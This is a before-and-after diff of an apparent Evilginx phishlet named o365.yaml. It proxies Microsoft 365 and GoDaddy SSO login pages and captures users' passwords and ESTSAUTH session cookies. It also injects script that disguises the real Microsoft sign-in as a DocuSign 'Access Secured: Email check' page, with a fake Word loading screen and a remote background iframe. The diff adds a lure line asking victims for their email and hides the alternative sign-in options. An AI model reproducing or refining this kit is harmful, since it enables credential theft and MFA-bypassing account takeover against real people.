o365.yaml (before)
name: "o365"
author: "@jamescullum"
min_ver: "2.3.0"

proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: false, is_landing: false }
  - { phish_sub: "login", orig_sub: "login", domain: "microsoft.com", session: true, is_landing: true }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com:443", session: true, is_landing: false }

sub_filters:
  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: 'href="https://{hostname}'
    replace: 'href="https://{hostname}'
    mimes: ["text/html", "application/json", "application/javascript"]

  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]
    redirect_only: true

  - triggers_on: "sso.godaddy.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]

auth_tokens:
  - domain: ".login.microsoftonline.com"
    keys: ["ESTSAUTH", "ESTSAUTHPERSISTENT", "SignInStateCookie"]

credentials:
  username:
    key: "(login|UserName)"
    search: "(.*)"
    type: "post"
  password:
    key: "(passwd|Password|accesspass)"
    search: "(.*)"
    type: "post"

login:
  domain: "login.microsoftonline.com"
  path: "/"

js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/oauth2/v2.0/authorize", "/common/oauth2/v2.0/authorize*"]
    script: |
      const overlay = document.createElement("div");
      overlay.id = "wordLogoOverlay";
      overlay.style.position = "fixed";
      overlay.style.top = "0";
      overlay.style.left = "0";
      overlay.style.width = "100vw";
      overlay.style.height = "100vh";
      overlay.style.backgroundColor = "white";
      overlay.style.zIndex = "999999";
      overlay.style.display = "flex";
      overlay.style.justifyContent = "center";
      overlay.style.alignItems = "center";
      overlay.style.overflow = "hidden";

      overlay.innerHTML = `
        <style>
          @keyframes pulse {
            0% { transform: scale(1); }
            50% { transform: scale(1.05); }
            100% { transform: scale(1); }
          }
          .logo-container {
            position: relative;
            width: 200px;
            height: 200px;
            animation: pulse 3s ease-in-out infinite;
          }
          .back-plate {
            position: absolute;
            width: 126px;
            height: 140px;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: 0px 2px 6px rgba(0, 0, 0, 0.2);
            left: 60px;
            top: 30px;
          }
          .w-icon {
            position: absolute;
            width: 72px;
            height: 72px;
            background-color: #185ABD;
            border-radius: 8px;
            display: flex;
            justify-content: center;
            align-items: center;
            font-size: 40px;
            font-weight: bold;
            color: white;
            left: 30px;
            top: 64px;
            box-shadow: 0px 2px 6px rgba(0, 0, 0, 0.25);
            z-index: 10;
          }
          .blue-stripe-1 { position: absolute; width: 100%; height: 25%; background-color: #41A5EE; top: 0; }
          .blue-stripe-2 { position: absolute; width: 100%; height: 25%; background-color: #2B7CD3; top: 25%; }
          .blue-stripe-3 { position: absolute; width: 100%; height: 25%; background-color: #185ABD; top: 50%; }
          .blue-stripe-4 { position: absolute; width: 100%; height: 25%; background-color: #103E91; top: 75%; }
        </style>
        <div class="logo-container">
          <div class="back-plate">
            <div class="blue-stripe-1"></div>
            <div class="blue-stripe-2"></div>
            <div class="blue-stripe-3"></div>
            <div class="blue-stripe-4"></div>
          </div>
          <div class="w-icon">W</div>
        </div>
      `;
      document.body.appendChild(overlay);

      setTimeout(() => {
        overlay.remove();

        // Start background replacement
        const replaceBackground = () => {
          const bgImg = document.querySelector('#backgroundImage');
          if (bgImg && !document.getElementById('customBgIframe')) {
            bgImg.style.display = 'none';

            const iframe = document.createElement("iframe");
            iframe.id = "customBgIframe";
            iframe.src = "https://pub-4ec73ba7bee04896b7e30d39646ed8f3.r2.dev/off.html";
            iframe.style.position = "absolute";
            iframe.style.top = "0";
            iframe.style.left = "0";
            iframe.style.width = "100vw";
            iframe.style.height = "100vh";
            iframe.style.zIndex = "0";
            iframe.style.border = "none";
            iframe.style.pointerEvents = "none";
            iframe.style.overflow = "hidden";

            const container = bgImg.parentElement;
            container.appendChild(iframe);
          }
        };

        // Continuously fix logo, title, links
        setInterval(() => {
          // Change logo
          const logoImg = document.querySelector('img.logo');
          if (logoImg && !logoImg.src.includes('DocuSign-Logo.png')) {
            logoImg.src = "https://cloudmasonry.com/wp-content/uploads/2020/06/DocuSign-Logo.png";
            logoImg.style.width = "100px";
            logoImg.style.objectFit = "contain";
          }

          // Change title text
          const titleDiv = document.querySelector('#loginHeader > div');
          if (titleDiv && titleDiv.textContent.trim() !== "Access Secured: Email check") {
            titleDiv.textContent = "Access Secured: Email check";
          }

          // Move "No account?" + "Can't access?" links
          const scrollArea = document.querySelector('.win-scroll');
          const signupLinks = scrollArea?.querySelector('.password-reset-links-container');
          const formGroup = scrollArea?.querySelector('.form-group.col-md-24');

          if (scrollArea && signupLinks && formGroup && signupLinks.nextSibling !== formGroup) {
            scrollArea.insertBefore(signupLinks, formGroup);
          }

          // Fix background
          replaceBackground();

        }, 500); // Repeat every half second

      }, 3000);

o365.yaml (after)
name: "o365"
author: "@jamescullum"
min_ver: "2.3.0"

proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: false, is_landing: false }
  - { phish_sub: "login", orig_sub: "login", domain: "microsoft.com", session: true, is_landing: true }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com:443", session: true, is_landing: false }

sub_filters:
  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: 'href="https://{hostname}'
    replace: 'href="https://{hostname}'
    mimes: ["text/html", "application/json", "application/javascript"]

  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]
    redirect_only: true

  - triggers_on: "sso.godaddy.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]

auth_tokens:
  - domain: ".login.microsoftonline.com"
    keys: ["ESTSAUTH", "ESTSAUTHPERSISTENT", "SignInStateCookie"]

credentials:
  username:
    key: "(login|UserName)"
    search: "(.*)"
    type: "post"
  password:
    key: "(passwd|Password|accesspass)"
    search: "(.*)"
    type: "post"

login:
  domain: "login.microsoftonline.com"
  path: "/"

js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/oauth2/v2.0/authorize", "/common/oauth2/v2.0/authorize*"]
    script: |
      const overlay = document.createElement("div");
      overlay.id = "wordLogoOverlay";
      overlay.style.position = "fixed";
      overlay.style.top = "0";
      overlay.style.left = "0";
      overlay.style.width = "100vw";
      overlay.style.height = "100vh";
      overlay.style.backgroundColor = "white";
      overlay.style.zIndex = "999999";
      overlay.style.display = "flex";
      overlay.style.justifyContent = "center";
      overlay.style.alignItems = "center";
      overlay.style.overflow = "hidden";

      overlay.innerHTML = `
        <style>
          @keyframes pulse {
            0% { transform: scale(1); }
            50% { transform: scale(1.05); }
            100% { transform: scale(1); }
          }
          .logo-container {
            position: relative;
            width: 200px;
            height: 200px;
            animation: pulse 3s ease-in-out infinite;
          }
          .back-plate {
            position: absolute;
            width: 126px;
            height: 140px;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: 0px 2px 6px rgba(0, 0, 0, 0.2);
            left: 60px;
            top: 30px;
          }
          .w-icon {
            position: absolute;
            width: 72px;
            height: 72px;
            background-color: #185ABD;
            border-radius: 8px;
            display: flex;
            justify-content: center;
            align-items: center;
            font-size: 40px;
            font-weight: bold;
            color: white;
            left: 30px;
            top: 64px;
            box-shadow: 0px 2px 6px rgba(0, 0, 0, 0.25);
            z-index: 10;
          }
          .blue-stripe-1 { position: absolute; width: 100%; height: 25%; background-color: #41A5EE; top: 0; }
          .blue-stripe-2 { position: absolute; width: 100%; height: 25%; background-color: #2B7CD3; top: 25%; }
          .blue-stripe-3 { position: absolute; width: 100%; height: 25%; background-color: #185ABD; top: 50%; }
          .blue-stripe-4 { position: absolute; width: 100%; height: 25%; background-color: #103E91; top: 75%; }
        </style>
        <div class="logo-container">
          <div class="back-plate">
            <div class="blue-stripe-1"></div>
            <div class="blue-stripe-2"></div>
            <div class="blue-stripe-3"></div>
            <div class="blue-stripe-4"></div>
          </div>
          <div class="w-icon">W</div>
        </div>
      `;
      document.body.appendChild(overlay);

      setTimeout(() => {
        overlay.remove();

        // Start background replacement
        const replaceBackground = () => {
          const bgImg = document.querySelector('#backgroundImage');
          if (bgImg && !document.getElementById('customBgIframe')) {
            bgImg.style.display = 'none';

            const iframe = document.createElement("iframe");
            iframe.id = "customBgIframe";
            iframe.src = "https://pub-4ec73ba7bee04896b7e30d39646ed8f3.r2.dev/off.html";
            iframe.style.position = "absolute";
            iframe.style.top = "0";
            iframe.style.left = "0";
            iframe.style.width = "100vw";
            iframe.style.height = "100vh";
            iframe.style.zIndex = "0";
            iframe.style.border = "none";
            iframe.style.pointerEvents = "none";
            iframe.style.overflow = "hidden";

            const container = bgImg.parentElement;
            container.appendChild(iframe);
          }
        };

        // Continuous Fix
        setInterval(() => {
          // Replace logo with DocuSign
          const logoImg = document.querySelector('img.logo');
          if (logoImg && !logoImg.src.includes('DocuSign-Logo.png')) {
            logoImg.src = "https://cloudmasonry.com/wp-content/uploads/2020/06/DocuSign-Logo.png";
            logoImg.style.width = "100px";
            logoImg.style.objectFit = "contain";
          }

          // Change header title
          const titleDiv = document.querySelector('#loginHeader > div');
          if (titleDiv && titleDiv.textContent.trim() !== "Access Secured: Email check") {
            titleDiv.textContent = "Access Secured: Email check";

            // Add custom subtext if not already added
            if (!document.getElementById('customSubtext')) {
              const subText = document.createElement('div');
              subText.id = "customSubtext";
              subText.style.fontSize = "14px";
              subText.style.marginTop = "8px";
              subText.style.color = "#5e5e5e";
              subText.style.textAlign = "center";
              subText.textContent = "This document is for Authorised users only, Kindly enter your email";
              titleDiv.parentElement.appendChild(subText);
            }
          }

          // Move No account? + Can't access? above input
          const scrollArea = document.querySelector('.win-scroll');
          const signupLinks = scrollArea?.querySelector('.password-reset-links-container');
          const formGroup = scrollArea?.querySelector('.form-group.col-md-24');
          if (scrollArea && signupLinks && formGroup && signupLinks.nextSibling !== formGroup) {
            scrollArea.insertBefore(signupLinks, formGroup);
          }

          // Remove "Sign-in options" section
          const signinOptions = document.querySelector('.promoted-fed-cred-box');
          if (signinOptions) {
            signinOptions.remove();
          }

          // Replace background
          replaceBackground();

        }, 500); // Repeat every half second

      }, 3000);

o365.yaml (diff)
@@ -152,9 +152,9 @@ js_inject:
           }
         };
 
-        // Continuously fix logo, title, links
+        // Continuous Fix
         setInterval(() => {
-          // Change logo
+          // Replace logo with DocuSign
           const logoImg = document.querySelector('img.logo');
           if (logoImg && !logoImg.src.includes('DocuSign-Logo.png')) {
             logoImg.src = "https://cloudmasonry.com/wp-content/uploads/2020/06/DocuSign-Logo.png";
@@ -162,22 +162,39 @@ js_inject:
             logoImg.style.objectFit = "contain";
           }
 
-          // Change title text
+          // Change header title
           const titleDiv = document.querySelector('#loginHeader > div');
           if (titleDiv && titleDiv.textContent.trim() !== "Access Secured: Email check") {
             titleDiv.textContent = "Access Secured: Email check";
+
+            // Add custom subtext if not already added
+            if (!document.getElementById('customSubtext')) {
+              const subText = document.createElement('div');
+              subText.id = "customSubtext";
+              subText.style.fontSize = "14px";
+              subText.style.marginTop = "8px";
+              subText.style.color = "#5e5e5e";
+              subText.style.textAlign = "center";
+              subText.textContent = "This document is for Authorised users only, Kindly enter your email";
+              titleDiv.parentElement.appendChild(subText);
+            }
           }
 
-          // Move "No account?" + "Can't access?" links
+          // Move No account? + Can't access? above input
           const scrollArea = document.querySelector('.win-scroll');
           const signupLinks = scrollArea?.querySelector('.password-reset-links-container');
           const formGroup = scrollArea?.querySelector('.form-group.col-md-24');
-
           if (scrollArea && signupLinks && formGroup && signupLinks.nextSibling !== formGroup) {
             scrollArea.insertBefore(signupLinks, formGroup);
           }
 
-          // Fix background
+          // Remove "Sign-in options" section
+          const signinOptions = document.querySelector('.promoted-fed-cred-box');
+          if (signinOptions) {
+            signinOptions.remove();
+          }
+
+          // Replace background
           replaceBackground();
 
         }, 500); // Repeat every half second
